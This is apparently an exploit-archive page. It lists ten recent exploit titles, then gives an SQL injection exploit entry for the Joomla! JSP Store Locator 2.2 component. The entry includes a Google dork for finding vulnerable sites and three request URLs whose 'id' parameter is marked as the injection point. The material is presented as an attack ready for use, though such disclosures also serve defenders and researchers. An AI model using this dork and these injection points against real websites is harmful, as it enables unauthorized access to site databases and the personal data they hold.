
10 new exploits Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission GOM Player 2.3.10.5266 - '.fpx' Denial of Service Cisco ASA - WebVPN CIFS Handling Buffer Overflow OpenText Documentum D2 - Remote Code Execution Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit) Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities Joomla! Component JoomBlog 1.3.1 - SQL Injection Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection
20 lines
No EOL
938 B
Text
Executable file
20 lines
No EOL
938 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component JSP Store Locator v2.2 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jsplocation
|
|
# Date: 15.02.2017
|
|
# Vendor Homepage: http://joomlaserviceprovider.com
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/jsplocation/
|
|
# Demo: http://demo.joomlaserviceprovider.com/index.php/joomla/extensions/jsp-location-classic-theme
|
|
# Version: 2.2
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
|
|
# Etc...
|
|
# # # # # |